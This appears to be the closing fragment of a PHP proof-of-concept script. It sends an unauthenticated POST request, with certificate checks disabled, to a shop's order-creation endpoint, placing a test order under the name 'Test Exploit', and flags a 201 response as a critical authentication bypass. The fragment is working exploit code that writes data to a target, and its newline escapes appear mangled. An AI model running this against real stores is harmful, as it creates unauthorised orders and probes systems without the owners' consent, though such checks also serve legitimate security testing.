echo "n[+] Testing write access (POST to create order)n";
echo "    URL: $test_order_urln";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $test_order_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([
    'payment_method' => 'test',
    'billing' => [
        'first_name' => 'Test',
        'last_name' => 'Exploit',
        'email' => 'test@example.com'
    ]
]));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json'
]);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

curl_close($ch);

echo "    HTTP Status: $http_coden";
if ($http_code == 201) {
    echo "    [+] CRITICAL: Can create orders without authenticationn";
} elseif ($http_code == 200) {
    echo "    [+] Can potentially modify datan";
} elseif ($http_code == 401 || $http_code == 403) {
    echo "    [-] Write access properly restrictedn";
}

?>